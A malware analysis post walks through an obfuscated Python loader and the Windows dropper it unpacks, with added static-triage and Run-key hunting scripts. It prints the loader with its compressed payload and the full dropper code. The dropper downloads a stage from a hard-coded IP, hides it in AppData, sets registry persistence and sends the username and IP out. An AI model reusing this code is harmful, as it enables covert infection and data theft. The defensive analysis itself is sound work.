At first I had no idea what was going on, so I started by renaming variables to make things clearer. It turned out that this script is a loader for yet another script. The real payload sits in a global variable as a zlib-compressed byte string, placed at the far end of a very long line padded with spaces so it won't be noticed (the same trick as in __init__.py). Everything around it is noise: junk arithmetic, a class with misleading names, and a chain of lambdas that resolve eval, compile, zlib.decompress, vars and __import__('builtins').exec from hex-escaped strings, then decompress the variable and exec the result. After some really deep analysis that gave me a headache, I extracted the payload by modifying the script to decompress that variable and print it instead of running it. I have no idea why he keeps doing this, but here's the modified script:
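Renaming variables by hand works, but the obfuscation in this loader (hex-escaped names, a compressed blob in a constant, junk control flow) can also be stripped without ever executing it. The script below is an added example for this article, not the attacker's loader and not the author's modified script: it parses the file with Python's ast module, collects every string and bytes constant (the parser has already turned '\x65\x76\x61\x6c' into 'eval', so no eval is needed), and tries zlib.decompress on each bytes constant, which is how this loader stores its next stage. The obfuscated sample it analyses is constructed here and its "payload" is a harmless print().

```python
"""Static recovery of decoded names and compressed payloads from an obfuscated
Python loader. Added example for this article; the sample loader is constructed.
"""
import ast
import zlib
from typing import Dict, List

# Names whose appearance as (decoded) string constants usually means the file is
# assembling calls it does not want a plain grep to find.
SUSPICIOUS_NAMES = {"eval", "exec", "compile", "__import__", "globals", "vars",
                    "zlib", "decompress", "builtins"}


def _constants(source: str, kind):
    tree = ast.parse(source)
    return [n.value for n in ast.walk(tree)
            if isinstance(n, ast.Constant) and isinstance(n.value, kind)]


def string_constants(source: str) -> List[str]:
    """Every str constant in the module, escapes already resolved by the parser."""
    return _constants(source, str)


def inflate_payloads(source: str) -> List[bytes]:
    """Every bytes constant that is a valid zlib stream, decompressed."""
    out = []
    for blob in _constants(source, bytes):
        try:
            out.append(zlib.decompress(blob))
        except zlib.error:
            continue  # ordinary bytes, not a compressed stage
    return out


def triage(source: str) -> Dict[str, list]:
    """Suspicious decoded strings plus any embedded zlib payloads, without executing anything."""
    decoded = string_constants(source)
    hits = sorted({s for s in decoded if s in SUSPICIOUS_NAMES or "__import__" in s})
    return {"suspicious_strings": hits, "payloads": inflate_payloads(source)}


# Constructed sample in the style of the loader above: hex-escaped names, a
# zlib-compressed stage stored in a constant, and an always-false guard.
STAGE2 = b"print('stage two would run here')"   # harmless stand-in for the real payload
SAMPLE_LOADER = "\n".join([
    "_k = " + repr(zlib.compress(STAGE2)),
    "_f = globals()['\\x65\\x76\\x61\\x6c']",                                   # 'eval'
    "_z = __import__('\\x7a\\x6c\\x69\\x62')",                                  # 'zlib'
    "_d = getattr(_z, '\\x64\\x65\\x63\\x6f\\x6d\\x70\\x72\\x65\\x73\\x73')",   # 'decompress'
    "_e = _f('\\x5f\\x5f\\x69\\x6d\\x70\\x6f\\x72\\x74\\x5f\\x5f\\x28\\x27\\x62\\x75"
    "\\x69\\x6c\\x74\\x69\\x6e\\x73\\x27\\x29\\x2e\\x65\\x78\\x65\\x63')",          # __import__('builtins').exec
    "if 535745 > 6635814: _e(_d(_k))",
])

if __name__ == "__main__":
    result = triage(SAMPLE_LOADER)
    print("decoded names:", result["suspicious_strings"])
    for payload in result["payloads"]:
        print("payload:", payload.decode())
```

Because the analysis is purely syntactic, the junk comparisons and the lambda chain never matter: whatever the loader would eventually feed to exec has to exist somewhere as a constant, and this pulls it out. For nested loaders, run triage() again on each recovered payload.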

#Lets Try
import zlib
from builtins import *
from math import prod as prodl
_execution_variable_ = '尝试尝试 = "尝试尝试"'
_exec, _str, _tuple, _map, _ord, _globals = exec, str, tuple, map, ord, globals

# Custom part
def translate_tuple(tuple_values):
translated_chars = []
for value in tuple_values:
# Handling special cases for space, equals sign, and double quote
if value == 32:
translated_chars.append(' ')
elif value == 61:
translated_chars.append('=')
elif value == 34:
translated_chars.append('"')
else:
# For other values, assume they are Unicode code points
translated_chars.append(chr(value))
return ''.join(translated_chars)

class productClass:
def __init__(self, init_variable):
self.math_prod_output = prodl((init_variable, 78309))
self.do_some_math(math_input=87522)
def do_some_math(self, math_input = Ellipsis):
self.math_prod_output *= 43545 * math_input
def does_map(self, _map = -24271):
_map /= 38361 / -84088
self.call_custom_function != float
def get_global_variable(_理论 = bool):
return _globals()[_理论]
def set_global_variable(算法 = -80858 - -48824, variable_value = bool, globals_obj = _globals):
# The global variable being set is the next malware for our research
# It's zlib compressed so we need to decompress it
decompressed_malware = zlib.decompress(variable_value)
print(decompressed_malware.decode('utf-8'))

globals_obj()[算法] = variable_value
def execute(execution_variable = str):
print(translate_tuple(_tuple(_map(_ord, execution_variable))))
return 0
return _exec(_str(_tuple(_map(__ord, execution_variable))))
@property
def call_custom_function(self):
self.custom_function = '<_主要的_.do_some_math 物体 で 0x00000451242BE559812>'
return (self.custom_function, productClass.call_custom_function)

if __name__ == '__main__':
try:
productClass.execute(execution_variable = _execution_variable_)
print('executed')
productObject = productClass(init_variable = 47761 + -76211)
if 535745 > 6635814:
productObject.does_map(_map = 52743 * productObject.math_prod_output)
elif 423698 < 6928056:
productObject.does_map(_map = 30109 + productObject.math_prod_output) ;productClass.set_global_variable(算法='ぱさらぱぱらららぱらさぱぱささぱぱぱぱららささらさぱぱらささささららぱらら',variable_value=b'x\x9c\xed\\\xcdO\xe3H\x16\xbf\xe7\xaf\xf0\xfab[\x1d\xdc\x81i\xcd\xb2H90\x10z\xd1t\x03\x1b\xc2\xb0\xbb\x04E\x8e]I\xaaq\\\x9er\x19H#\x0e\xcci\x86\xc3\xcc\t\xf5\x9f\x80\xc4e\x94\xc3^\xfb\x9f\xe1\x1f\xd9W\xfe(\x97?\xd2\xbbZ\xad\x940m\xdaJ\xca\xaf\xde{\xf5\xbe\xea\xf7*_\xed\x12\xdbr\x03\xdd8\xd3\x9e\xef\xee\x9f\xef\x9e\xd2Gq\xddK\xf4\xfb\x05\xb7e\xa2,^\xd6\xf3\xb4\x80\xbf\xb8\xb4v\xde\x1e\xbbd\x08\x066V\xd0\xba(h?\xfd\xf2|7\xe7\x8f\xf1 \x1e\xdf=D\xd7\x9c?&\xb7\xf3\xdc@\xbeb\xa9\x9c\x12I*Q%\x14\xa6z\n\xe2\xd9\xad\xc4\\P\x9e\x8c\x1fJ\x06\x14\x94\xf3\x81v\xb6\xb5\xf5j\xed\xd5\x9a\xbe\xa6\xbfZ7\x8c\xf3\xf3\xb6\x83\xe9\xca&\xa1\x9a\xe3>\xaf\xf4\xa9\xca\xc42\xb1\xd2\xc3\x82\xb7O\xe5\xf0\x8c\x11\xb3\x18[\xdd\x10\x89\xca\xca\xe5\xf9!+\xa2B)U\xb2\x89\xd2\x93K&7x\xc8(r\xf5\xc9\x0b\xc9\x9c\xe5}#o\x82d-i\\(\xdbt\x008\xe1F8\xd6\xf8c\xfb)2\xf9\xb9x\tb<\xc8\x84?\xe7\x06\x82G\x10\x0b\x0c\x95z\xe4\xdb\xbb\xcf\x10\xec\xc1\x00O}B\xd9`\xb0\xb2\xf5~\xf7{t\xfd+\xbd\xc4\xed\xaf\xd1\x15\x0fd\x86_%6\x99A\xd0\xe5\xd9\x82*\xc1,\xcb\x16\xd8~\x97\xf4\xc8&\x15t&c\x08\xf2\xd2\x13\xadk\xc3\x10\xbb\x0c{\x81f\x98\x97\x16\xfd*vWE!\x17\xea\xae\xdc\x0e\x16Uhe\xa9&c\x9e\xe0\xff\xa2\xd1Tm\x97\xa7\x12}\x911\xc5\x9d\xa4\xaf@M\x05\x1ef.\x0e\x87\xc5\x16j4+N*\xd5\x87\x95y\xb10\xe4\xfc~\xf9lT,\x9e\x05\x07\xb5\x82\xf2\x9c\x01\xf3\\Ee&=\xe4\xf4K;b\xa5\xa3n\x9c\xd5a_F\xd8M\xec9\xe8Z\xd7P\xe0Z{\xa5\xe9s\xa3\xf1\xd2;X\x8c\xa6??\xdf}z\xbe{\x8c\x1f[\xad\xe8\xf9S\xf6\xf4(\xaeV\xca\xf5)\xe1\xcdF-!\xf2(T\t\t~\xdf\xaa\xc1\xb4\x06\xd3U\x88z\r\xa6\xcb\x05Sf\x11wT\r\xa6\xf7U\x00Q>\xa6U\xc2D\xe5Q\xae\x08\x07\xff\xdb\xab\x94\x9f[\x1c\xde\x1e[2\xaa\xa5\xa0\xf7X\x80\xc4d\xb6\xd5\x92\x11\xf21\x15\x17*>\x01\x1aj\x9a\xf9\x81`\xef\xab8\xb0\xcf\xd38\xff&]\xf3<}\x9e\xa7\x8b\xdb\xfbt<_ 
u\x9f\xe7\x9c\xe7W\xb9\x97\xd4\x16\xe8sI\xa4p\xfb[\xdd\xae\xeav\xb5\nQ\xaf\xdb\xd5r\xc2\x9e\xb6+\xd7\xbaD/\xaa[}\x01\xa4\x9e\x16,\xf6\x058\xab\xb4\xb5\x12\xd1\x16\xf9\xc3\xaf\x1aLk0]\x85\xa8\xd7`\xba\\0E!\xed\xfdq\xdfGI\x81\x89\x87\xe3)\x8d\xd1S\xeeQ\x1e\xc8\x97,R\xe0\xafd\x88nkT\xadQu\x15\xa2^\xa3\xear\xc2.\x8e\xa8\x84\x94gW\xf8\x88ZLK\x95\xe7_\x88Q9\xb8r\x94e\x91B\xb6\n\xe3ER?\xfd\xf2\xd5\x02+\xc6v`y\xb8\x06\xd6\xd5\x88z\r\xac\xcb\t{\n\xac\xb3\x11v\xaf\xd1\xc4\x0b_\x12\xba\x16R.\xdffi\xce\xe7#\xcbY\xe9\xab\x90i\xc2r\x82\xd9@\xae6iE\xb9\x02\xca\xa5S\x90\xad\x16\x9c\x97l\xe3\xc4\xaf\x16\x99\xeb#\xefJE\xbdF\xe6\xe5\x84]\xbc\x91\xe0b\x7fJ\xec\x17\x85\xcb\x02\xef\n\x1fM\xddGD\xa1B\xf0\x08z\x81s.\xd1\x0b\x1fk\xcdK\x1f\xa1\xddW\xad5/}\x9c6\xaf\xe1\xb5\x86\xd7\xd5\x89z\r\xaf\xcb\x85W\xca\x82\x97\x04\xadY:\x1f*\x06\xe5Z)\xdf\x96kbQ\x05T\xe4\xf5\xa1bPYC\xf2\x94\x18ge\x97/\xf7\x82\x9dw\x0frF\xa4\x96\xf1b\xbeQ\xa1\x97v\xcf\xca\xbd\xf1\xa3\x0f\xb5o\xd67\x9c\x8d\xcd\r\xe7\x9b\xd6\xc6_4\xc3t\x90M\x1c\xa4k\x9b#V~\x15hD\xbf*\xaa;f\xdd1\x97\x1e\xf5\xbac.\'\xeci\xc7\xb4\xd1u\xe5\xd7D\xe0oD\xc9TI\x7f\xa5\xa3\xc4?\xcaR\x1cL\x9b b7\xa9\xe5\x8dQ\x93\xf8\xc8\x83{\xcc\x1a\x9c\xa8k\x1aH&\x9cA8\xf4)\xb1Q\x10\xa4\x14L\xc4\xdcL\x10\x87V\x80\xbe}\x93\xdeQ\xf4c\x88\x02\x16\xc4\x8b\x13\xb1\xec\x181\xe4]6\x15\xcf\x9a\xa2\xa6\xe2\xe2\x80qC8\xd9%c\xec526\xdf\xca\x16\xbc\xc2\x1eE\xe3X\x17\xd8\xeb\xc0S2cO\x08\xb6Q\xba\x8a\xe9[l\x92N\xe1`\x84]X\x84\x7f\xc7\xb1\xc9\xfd\xe5k6\x1a\x0e\x1aq\xf5\x03\xec_\xbe\x19X\x8eC\xc11\xdd\xd8j(\xf0\xc7\xe8,\x1e\xf0?\x8aXH=\xe1\x89\tB\xba:a\xcc\xdfz\xfd\xda\x9e 
\xfb\x02\xfb\xa65\xb5>\x12\xcf\xba\nL\x9bLU\xc3d\xe8\x9a\x99\x01\xa3\xd8\xd7\x8dH\x11\xba\xb6\x91\xcf\x94N\xf4\x84\x89\xa7X\x81\x82Jkh\x07\xc4C\x1aD\xdc\xe7V)\xed\n\x03ar\x14EM\xf9S[Q=\xa6n%\xfa1\xe3\x93\xfel\xc0\x13\x17\x80\xec\x99\xea\xcf\xd8\x84xWjS\x81a\xf2\xa4\x9e7F\x84*\t\x9f\x82\xbdt\x18T\xb8\x9e\xa5\xdc\xa4\xa1\xa7\x9f%\xac\xa0hm\xed\x12\xd1\x00\x1cQ\xcf\x9b\n$\x8f\x84\xac-q\x1f\xed\x1fu":\xa2\xb4H7\x84\xfa!E\xd6\x85\x1c\x9e=H\xd4\x01a{$\xf4\x9c\x0e\xa5\x84f\xa6\xd8\xc4\x83\xb2\rQ\x03\xb9A\x12\xb8\xd4\x87\xb6\x92x\xaar\xff#\x97\x07Q\x01\xb4\xa3\x9c\xebI\xcau(R\x93\x0b\x84\xcc\x1a\xba\xc8h*#\xed&\xd1q\xcb\'x\xads\xc6(x\xd1\n\xea[j\xf9\x13l\x07\xbb\x14\x83\xbfj3\xa6\x1e\x83\x0e\x8a\xd9l\x07y,\xa3\xf6\xac\xe0\xe2\x18\n\xc2\t\xdd\x8c\xf8\x1e9\xd8z\x87\x87\xd4\xa2\xb3\x94v\x12 zD\t\xaf\xca \xa5\x1d vE\xe8\x05\xf6\xc6=B\\A>"W\x88\xbe\xb7<k\x8c\xa6\xb0XJ\xe6q\xea\\\xfb.\xa1\xd9J\xbb(\xb8`\xc4?\xc5\x0e\x14M\x90Q/a_\xc4\x1a\x04k\x17\x8da\xc3\xd1Y\xc7\xc1\x8c\x08\xeaw\x96}\x11\xfa\'\x0c\xbb\xe0\x9a0\x80b\x8f\xfd-D!\x12\xce\xcf\x02\x86\xa6\'\xbecI\xbe\x7f\xe7\x86\x88\x11\xc2&\xc7\x0c\xb4\x08\xe7-\xdf\xcfx\xde\x11\xcb\xc9\xee\xde\xf2@#\xca\xad\x13\xc6\xbe\xc76%\x01\x19\xf1\xad\xe3@\x95N-\xe1\xb1\xe5\x90\xa10a7\xaf\x18l\x0c\xa6\xc2<\x9f\xd8yS\xcd\xde\x04\xea\xcc\x81\xd0\x9a=<\xcd\xc4N\xf6\xcd#7\x04\xb01\x0fl\xbf \xd2\r\xa1\xda\xa6\xc8<F\x14[.\xfeh\xf1=k\xfe}\xea\x16\xf8 mfZ\r\x15S\xdd\x043*\xa6\xc0\xe8)fPU\xc5\xc9\xfdC \x9c\xc7\xf8\xf4\x16\xb1n\x04s\xbb\x98\xd2\x14\x9cb\xe0s\t/\xfc\x18\xf6\xf4\xb3\x18Nuu\xfb\xe8hw\xbb\xb7\xad\x1aM%%\xbd;\xdc\xd9~\'\xe8\xe7\xf1\xee\x83-9".\xa4\x83\xd7z\x82\xbe\xbaP\x1c\xf3p\x98\x18p\x80\x88:\x83\xbe\xde2r\xc0\x10/\x9d\xd9\x90\xa9\xcc6x\xfc\xff1(#\xecY./w1!( 
\x9f\xf9\xf3JQ\xfb}\x15\x9e\x84z!\xc0A\x8f\xa4X\xae\x0bqC\x01aE\x85\x7f\xd1\xac\x97If\xb6J\xf8\x9a7$!\xa6\x81\xeau\xde\x1f\xa9F\x1c\xf8\x1d\xa8\x18\x86"8\x82:\x85\x05#\xcf\xa4\x04D\x08,|\x8fP\xc3(N\x8a\xd5\xcc\xc0\x87=\xa5s\xe7\x8c\xb3\xb5\xf5s\xee\xa8\xc9\xfdL\x99\xffc\xbc\x0b\xee\xab7\xb1A\xb7\xfd\xfeM\xaa\xe3V5\xaa}V%\x96FU0\x16\x9a\xa7\xaa\xd1\x0f\x03\xf4\xc4KuhCl\xc6\x13\xfc\xe1\xc2\x9dz\xc4\xff\x91\x06,\xbc\xbc\xba\x9e}T\x8d\xa2\xf5\x9bF\x12\xc9S\xd8\x1aQ y\xd6 a\xb1\x8dW\x18\xe0\x99\x9f5\xf4\xb87O\xe1\xb5M[\xe5-\ny\xf0:\x07\xf6j[\r\xd9hm\x134C\xa7\x1ce\x9e\x8d\xcc+\xaeQ\xafl\xc7\xeb\xdfn\x98\x1bo6\xcd\xf5V\xcb\xdcX\xff\xf3\xd6f\xeb\xf5\x98\x0e\x93~\x9c\x18\x04\x08EYl\x10o\x12\x89Ar\x8f\x8a\xec:+6\x87\xa6\xc2\xd9\xa1\xdb\xd9\xbc6\x00\x0eF\xae5\x0e\xe4\xe6\xb6\xd3\xedl\xf7:\x83\x83\xc3\xc1\xe9\xfe\xc1\xee\xe1i\xba b\xd1\x9a\xb9\xe5|BF\xc8I\xba\xd4HSo\xe4\xc6u\x0b\x05}\x13\x0f\xb4$\\\x1e?\xf8\x00k|\x022\xff\xfa}\xe7\x1f\x83\x9d\x93n\xb7s\xd0\x1b\x9c\x1cw\xba\xb1V\xbe\x0c\x0b}\xde\x11\x8f\x0f\xf7z\xa7\xdb\xddN\xbf/P\xb5\xdf?\x85C"\xb9\n\xfa\xfd\x9d\x90R\xe8\'?\xc4=\xbc\xdf\x07\xbc\x8bk\xe3\x02\xcd\xecl\x99x\x1b|\x8ff\x9dk=\xb1\xa1)Vi*\xadf\xca\xc8\xcd9\xed\xee\xf7\x92\xe6\x9eP\xc1\xf3\x1f,\xe8\x0c \xcd\xf56\xf3\xdbE\x96\xefv\xde\x0e\x8e\xff\xd9\xe4\xc5*\x85\xe6\x96o\xc7\xc6^T\xea\x87\xa3\xbd\x18.\n\x98\xd8\xe0\x1bTL\x16\xf7\xad,k4\xf6B\xd7M\x18sJ\x05\xeed\xba\x1aR\xdd\xa6bFC\xaa\x9d\x8c(NL"\xd1\xd9\\|\xaeI\x8e+\xfc \xdb\x08\xa1\xe9%\xf8\x90\x1evuC\x81\xcd\x93\x1cuy=s\x1e~\x98\xa3\x1c\x1d\xd3:\xf7I\xc0tmq\xa1G\xaa>@\x99~\x08\x88\xd7\xbeQ\xd3\x85\xd4-%\x1d\xc2\xb9\x8d\x0f\xb1\x0f\xb4\xf8\x88\x99P\x02\xa8i\xe4\x05\x13\x02\xc7I%\xbbq\xb1wq\xdbT&\x887\xee\xa0}\xa3\xed\xc0!\x0c\xcaf\x8d\xcd|\xa4m)\x1a\xb4a\x17\xdb\xd1nx\xcd\x97\xd5n\x97\x9f\xb0\x1d\x17\xfb\xff\xd7\x9c\xfd\x1b\xd6a\xee\x1f')
exit()
productClass(init_variable = -8638 * -84594).do_some_math(math_input = productObject.math_prod_output - -61335) ;ぎふふはぎはぎぎぎぎはふはふふふふぎぎぎふぎぎふはふふぎふぎははぎぎ,えし000でししし0しで00ででで0で00で0でしででししでし0でで00で000し000,あびびびびびああびびあびああびああああびびあびびびびあああびびびびびあああびびびびびびびあびびびびびあびびびびびびびびびあびああび,ららららなならななららららなななならららららならななららななななららららななならららなならなななららなららららなななららならら,まららままらまらららまらららままららまらまららまららまらまらままららまらららまらままらららまらららまらまららららららままままらままま=(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ['\x64\x65\x63\x6f\x6d\x70\x72\x65\x73\x73']),(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)"),filename='\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa',mode='\x65\x76\x61\x6c'))),(lambda ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ(__import__('\x7a\x6c\x69\x62'))),(lambda え0しででで0ででで0し0で0しししででしで0000で0し0でしでししでで0で0し00ででで00ででで0,ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:え0しででで0ででで0し0で0しししででしで0000で0し0でしでししでで0で0し00ででで00ででで0(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)),(lambda:(lambda 
ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ:globals()['\x65\x76\x61\x6c'](globals()['\x63\x6f\x6d\x70\x69\x6c\x65'](globals()['\x73\x74\x72']("\x67\x6c\x6f\x62\x61\x6c\x73\x28\x29\x5b\x27\x5c\x78\x36\x35\x5c\x78\x37\x36\x5c\x78\x36\x31\x5c\x78\x36\x63\x27\x5d(ぱぱおくぱくおくおぱおくくくおぱおぱくぱぱくぱくぱくおくくくおおぱぱくぱぱぱ)"),filename='\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe3818a\xe3818a\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe381aa\xe3818a\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe381aa\xe3818a\xe381aa\xe3818a\xe3818a\xe381aa\xe381aa\xe3818a\xe3818a\xe3818a\xe381aa',mode='\x65\x76\x61\x6c')))('\x5f\x5f\x69\x6d\x70\x6f\x72\x74\x5f\x5f\x28\x27\x62\x75\x69\x6c\x74\x69\x6e\x73\x27\x29\x2e\x65\x78\x65\x63'))
productObject.do_some_math(math_input = productObject.math_prod_output / 65491) ;まららままらまらららまらららままららまらまららまららまらまらままららまらららまらままらららまらららまらまららららららままままらままま()(ららららなならななららららなななならららららならななららななななららららななならららなならなななららなららららなななららならら(ぎふふはぎはぎぎぎぎはふはふふふふぎぎぎふぎぎふはふふぎふぎははぎぎ(あびびびびびああびびあびああびああああびびあびびびびあああびびびびびあああびびびびびびびあびびびびびあびびびびびびびびびあびああび(えし000でししし0しで00ででで0で00で0でしででししでし0でで00で000し000('\x76\x61\x72\x73'))),productClass.get_global_variable(_理论='ぱさらぱぱらららぱらさぱぱささぱぱぱぱららささらさぱぱらささささららぱらら')))
except Exception as excp:
print(excp)
if 496203 > 7675892:
productClass.execute(execution_variable = _str(excp))
elif 387379 > 5850648:
productClass(init_variable = -82712 * 93033).do_some_math(math_input = productObject.math_prod_output * 80573)

I neutralised _exec by making execute() print its argument and return 0, and added an exit() right after set_global_variable(), the call that stores the compressed payload, so nothing after it is reached and the payload itself never runs. With those changes the script is safe to run, and running it printed yet another Python script:

from builtins import dir, exec, range, open, exit
exec('')

import subprocess
import io
import sys
import base64
import requests
from os import getenv, name, listdir, getlogin
import getpass
import winreg
from random import choice
from os.path import isfile, join, dirname


def get_ipv4_address():
    # Public IP for the check-in; 'None' if offline.
    try:
        return requests.get("http://checkip.amazonaws.com").text.strip()
    except Exception as e:
        return 'None'


ipipv4 = get_ipv4_address()

# Windows only: everything below relies on winreg, pythonw.exe and CREATE_NO_WINDOW.
if name != "nt":
    exit()

# Same launcher probe as the earlier stage, console-less launchers first.
py_execs = ["pythonw", "pyw", "py"]
for py_exec in py_execs:
    try:
        subprocess.run([py_exec, "--version"], stdout=subprocess.PIPE, stderr=subprocess.PIPE)
        break
    except FileNotFoundError:
        continue
else:
    py_exec = "python"

pythonw_path = join(dirname(sys.executable), f'{py_exec}.exe')

# System-sounding names used both for the dropped file's suffix and the Run value name.
names = [
    "GraphicsDriver",
    "SecurityCenter",
    "TaskScheduler",
    "MediaLibrary",
    "UserProfiles",
    "NetworkingTools",
    "PowerManagement",
    "FileExplorer",
    "DesktopWidgets",
    "DeviceManager",
    "RegistryEditor",
    "BackupUtility",
    "PrintQueue",
    "SystemUpdater",
    "BluetoothStack",
    "Mapper",
    "Loader",
    "Gameservices",
    "Microsoft.stdformat",
    "adobe",
    "DMapper",
    "Prism",
    "Spoc",
    "System.Threading.Timer",
    "UI.Plugin.Ncp",
    "System.Runtime.Serialization.Xml",
    "System.Net.Security",
    "System.Net.Requests",
    "System.Net.Primitives",
    "System.IO",
]


def GetRandomDirr():
    # Pick a random existing subfolder of %APPDATA% or %LOCALAPPDATA%; fall back to %TEMP%.
    randomloc = choice([getenv("APPDATA"), getenv("LOCALAPPDATA")])
    subfolders = listdir(randomloc)
    for _ in range(10):
        subchoice = choice(subfolders)
        global finalfile
        finalfile = randomloc + "\\" + subchoice
        if not isfile(finalfile) and " " not in subchoice:
            return finalfile
    return getenv("TEMP")


def CreateFileNamee(folder):
    # File is named "<subfolder>.<name>", no .py extension, so it blends in with the folder.
    randname = choice(names)
    randname = finalfile.split("\\")[-1] + "." + randname
    for _ in range(10):
        if not isfile(f"{folder}\\{randname}"):
            return f"{randname}"
    return finalfile.split("\\")[-1] + "." + "".join(choice("bcdefghijklmnopqrstuvwxyz") for _ in range(8))


def WriteFilee(file):
    # The final payload is written to disk as plain Python source.
    with open(file, mode="w", encoding="utf-8") as f:
        f.write(requests.get("http://162.248.100.217:80/grb").text)


def StartFilee(path):
    subprocess.Popen([f'{py_exec}.exe', path], creationflags=subprocess.CREATE_NO_WINDOW)


def SetStart(path):
    # Persistence: HKCU\...\Run value, named from the same list, pointing at pythonw.exe + the dropped file.
    spoofedpath = f'"{pythonw_path}" "{path}"'
    winnreg = winreg.HKEY_CURRENT_USER
    starttup = "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"
    keyc = winreg.CreateKeyEx(winnreg, starttup, 0, winreg.KEY_WRITE)
    winreg.SetValueEx(keyc, choice(names), 0, winreg.REG_SZ, f"{spoofedpath}")


FolderOfFile = GetRandomDirr()
NameOfFile = CreateFileNamee(FolderOfFile)
FullFile = FolderOfFile + "\\" + NameOfFile
WriteFilee(FullFile)
StartFilee(FullFile)
try:
    SetStart(FullFile)
except:
    pass

username = getlogin() or getpass.getuser()

# NOTE: 'screenshotlink' is never defined anywhere in the code as recovered.
r = requests.post('http://162.248.100.217:80/loginj', json={"username": username, "userip": ipipv4, "userscreenshot": screenshotlink}, headers={'Content-type': 'application/json'})


FolderOfFile = GetRandomDirr()
NameOfFile = CreateFileNamee(FolderOfFile)
FullFile = FolderOfFile + "\\" + NameOfFile
WriteFilClipe(FullFile)  # NOTE: 'WriteFilClipe' is also never defined in the recovered code.
StartFilee(FullFile)
try:
    SetStart(FullFile)
except:
    pass

Let me keep the explanation short this time. This is the dropper stage, and it only runs on Windows (it exits if os.name is not "nt"). It picks a random existing subfolder of %APPDATA% or %LOCALAPPDATA% (falling back to %TEMP%), builds a file name of the form <subfolder>.<name> from a list of system-sounding names such as SecurityCenter or System.Net.Security, with no .py extension, and writes the final payload fetched from http://162.248.100.217/grb into it. It launches that file with the console-less interpreter found earlier (CREATE_NO_WINDOW), then persists it by adding a "pythonw.exe" "<file>" value, again named from the same list, under HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run. It also reports back to the attacker's server, POSTing the username and the public IP (looked up via checkip.amazonaws.com) to /loginj, before repeating the drop-and-persist routine a second time. All of this happens without the user noticing anything. One caveat about the code as recovered: screenshotlink and WriteFilClipe are used but never defined in what is shown above, so either part of the script did not survive extraction or this copy would stop with a NameError at the POST.
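The persistence this stage leaves behind is specific enough to hunt for. The script below is an added example for this article, not the dropper's code: it scores HKCU Run values against the traits visible above (a Python launcher as the command, a value name drawn from the dropper's list, a script sitting directly in an AppData subfolder, and a file name of the form <subfolder>.<dropper name>). The scoring logic is my own and the threshold is a choice, not something from the malware; read_run_values() is a small helper that pulls the real Run key on Windows, and the sample entries are constructed so the logic can be exercised anywhere.

```python
"""Hunt for the dropper's HKCU Run persistence. Added example for this article."""
import re
import sys
from typing import Dict, List, Tuple

# Value names / file suffixes the dropper picks from (its own `names` list).
DROPPER_NAMES = {
    "GraphicsDriver", "SecurityCenter", "TaskScheduler", "MediaLibrary", "UserProfiles",
    "NetworkingTools", "PowerManagement", "FileExplorer", "DesktopWidgets", "DeviceManager",
    "RegistryEditor", "BackupUtility", "PrintQueue", "SystemUpdater", "BluetoothStack",
    "Mapper", "Loader", "Gameservices", "Microsoft.stdformat", "adobe", "DMapper", "Prism",
    "Spoc", "System.Threading.Timer", "UI.Plugin.Ncp", "System.Runtime.Serialization.Xml",
    "System.Net.Security", "System.Net.Requests", "System.Net.Primitives", "System.IO",
}

# '"<dir>\pythonw.exe" "<script>"' (quotes optional), any of the four launcher names.
RUN_VALUE = re.compile(
    r'^"?(?P<exe>[^"]+?\\(?:pythonw?|pyw?)\.exe)"?\s+"?(?P<script>[^"]+)"?\s*$', re.IGNORECASE)
# Script exactly one folder below AppData\Roaming or AppData\Local, as GetRandomDirr() produces.
APPDATA_DIR = re.compile(
    r"\\AppData\\(?:Roaming|Local)\\(?P<sub>[^\\]+)\\(?P<file>[^\\]+)$", re.IGNORECASE)


def score_run_value(name: str, command: str) -> Tuple[int, List[str]]:
    """Return (score, reasons); each matched trait adds one point."""
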